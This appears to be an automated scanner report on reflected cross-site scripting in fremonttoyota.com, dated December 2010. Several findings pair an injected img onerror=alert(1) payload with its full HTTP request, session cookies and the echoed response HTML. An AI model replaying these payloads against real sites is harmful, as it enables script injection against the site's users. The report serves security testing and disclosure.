GET /Toyota-Dealer/Cupertinoef97f"><img%20src%3da%20onerror%3dalert(1)>a34f8ea287a/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:45:22 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:45:23 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:45:23 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 19642
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d79cc'><img%20src%3da%20onerror%3dalert(1)>34805d93fde was submitted in the REST URL parameter 2. This input was echoed as d79cc'><img src=a onerror=alert(1)>34805d93fde in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Cupertinod79cc'><img%20src%3da%20onerror%3dalert(1)>34805d93fde/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:49:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:49:54 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:49:53 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 19637
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <img src='http://images.carprices.com/pricebooks_data/usa/colorized/2010/Toyota/View/Sienna/CE/5328_8R5.jpg' alt='Cupertinod79cc'><img src=a onerror=alert(1)>34805d93fde Toyota - 2010 Toyota Sienna 8 Passenger CE' style='padding-bottom:10px;'/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c033f<img%20src%3da%20onerror%3dalert(1)>cbee9737293 was submitted in the REST URL parameter 2. This input was echoed as c033f<img src=a onerror=alert(1)>cbee9737293 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Cupertinoc033f<img%20src%3da%20onerror%3dalert(1)>cbee9737293/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:53:54 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:53:55 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:53:55 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 19453
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7440d"><img%20src%3da%20onerror%3dalert(1)>b79a1049d8a was submitted in the REST URL parameter 3. This input was echoed as 7440d"><img src=a onerror=alert(1)>b79a1049d8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Cupertino/About%20Us7440d"><img%20src%3da%20onerror%3dalert(1)>b79a1049d8a/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:10:32 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:10:33 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:10:33 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 17903
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 680a3"><img%20src%3da%20onerror%3dalert(1)>438ce2e30f3 was submitted in the REST URL parameter 3. This input was echoed as 680a3"><img src=a onerror=alert(1)>438ce2e30f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Fremont/About%20Us680a3"><img%20src%3da%20onerror%3dalert(1)>438ce2e30f3/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:06:17 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:06:17 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:06:18 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 18783
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1fd"><img%20src%3da%20onerror%3dalert(1)>b42fba3063d was submitted in the REST URL parameter 3. This input was echoed as be1fd"><img src=a onerror=alert(1)>b42fba3063d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Milpitas/About%20Usbe1fd"><img%20src%3da%20onerror%3dalert(1)>b42fba3063d/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:08:40 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:08:40 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:08:41 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 17667
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc80e"><img%20src%3da%20onerror%3dalert(1)>240fa67c43a was submitted in the REST URL parameter 2. This input was echoed as cc80e"><img src=a onerror=alert(1)>240fa67c43a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Leandrocc80e"><img%20src%3da%20onerror%3dalert(1)>240fa67c43a/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:17:48 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:17:48 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:17:49 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 19735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <META NAME=KEYWORDS CONTENT="San Leandrocc80e"><img src=a onerror=alert(1)>240fa67c43a Toyota, San Leandrocc80e"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3c8de<img%20src%3da%20onerror%3dalert(1)>f59247f9b79 was submitted in the REST URL parameter 2. This input was echoed as 3c8de<img src=a onerror=alert(1)>f59247f9b79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Leandro3c8de<img%20src%3da%20onerror%3dalert(1)>f59247f9b79/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:23:20 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:23:20 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:23:21 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 19590
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <H1>Serving San Leandro3c8de<img src=a onerror=alert(1)>f59247f9b79 - Fremont Toyota</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a172'><img%20src%3da%20onerror%3dalert(1)>fdb3d2720d was submitted in the REST URL parameter 2. This input was echoed as 7a172'><img src=a onerror=alert(1)>fdb3d2720d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Leandro7a172'><img%20src%3da%20onerror%3dalert(1)>fdb3d2720d/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:20:49 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:20:49 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:20:50 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 19732
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <img src='http://images.carprices.com/pricebooks_data/usa/colorized/2010/Toyota/View/FJ_Cruiser_4x4/Base/4703_058.jpg' alt='San Leandro7a172'><img src=a onerror=alert(1)>fdb3d2720d Toyota - 2010 Toyota FJ Cruiser 4x4 V6 Base' style='padding-bottom:10px;'/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b06c"><img%20src%3da%20onerror%3dalert(1)>e68bbd579d7 was submitted in the REST URL parameter 3. This input was echoed as 7b06c"><img src=a onerror=alert(1)>e68bbd579d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Leandro/About%20Us7b06c"><img%20src%3da%20onerror%3dalert(1)>e68bbd579d7/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:33:47 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:33:48 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:33:48 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 18361
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b182a"><img%20src%3da%20onerror%3dalert(1)>3da4656882f was submitted in the REST URL parameter 2. This input was echoed as b182a"><img src=a onerror=alert(1)>3da4656882f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Mateob182a"><img%20src%3da%20onerror%3dalert(1)>3da4656882f/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:31:06 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:31:07 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:31:07 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 19592
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <META NAME=KEYWORDS CONTENT="San Mateob182a"><img src=a onerror=alert(1)>3da4656882f Toyota, San Mateob182a"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5ad98'><img%20src%3da%20onerror%3dalert(1)>0affbfd0b06 was submitted in the REST URL parameter 2. This input was echoed as 5ad98'><img src=a onerror=alert(1)>0affbfd0b06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Mateo5ad98'><img%20src%3da%20onerror%3dalert(1)>0affbfd0b06/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:35:53 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:54 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:35:54 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 19669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <img src='http://images.carprices.com/pricebooks_data/usa/colorized/2011/Toyota/View/4Runner/Limited/8668_1G3.jpg' alt='San Mateo5ad98'><img src=a onerror=alert(1)>0affbfd0b06 Toyota - 2011 Toyota 4Runner 4.0L Automatic Limited' style='padding-bottom:10px;'/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 158cb<img%20src%3da%20onerror%3dalert(1)>041e9d54138 was submitted in the REST URL parameter 2. This input was echoed as 158cb<img src=a onerror=alert(1)>041e9d54138 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Mateo158cb<img%20src%3da%20onerror%3dalert(1)>041e9d54138/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:39:31 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:39:32 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:39:32 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 19450
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <H1>Serving San Mateo158cb<img src=a onerror=alert(1)>041e9d54138 - Fremont Toyota</H1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d40ae"><img%20src%3da%20onerror%3dalert(1)>83a12b1460d was submitted in the REST URL parameter 3. This input was echoed as d40ae"><img src=a onerror=alert(1)>83a12b1460d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Mateo/About%20Usd40ae"><img%20src%3da%20onerror%3dalert(1)>83a12b1460d/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:47:21 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:47:21 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:47:22 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 18036
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1de38<img%20src%3da%20onerror%3dalert(1)>0e2f428d2ec was submitted in the REST URL parameter 2. This input was echoed as 1de38<img src=a onerror=alert(1)>0e2f428d2ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/4Runner1de38<img%20src%3da%20onerror%3dalert(1)>0e2f428d2ec/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:40:20 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:21 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:40:21 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota 4Runner1de38 ...[SNIP]... <H1> Toyota 4Runner1de38<img src=a onerror=alert(1)>0e2f428d2ec</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb8d"><img%20src%3da%20onerror%3dalert(1)>212fce5c129 was submitted in the REST URL parameter 2. This input was echoed as bbb8d"><img src=a onerror=alert(1)>212fce5c129 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/4Runnerbbb8d"><img%20src%3da%20onerror%3dalert(1)>212fce5c129/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:33:31 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:33:31 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:33:32 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16209
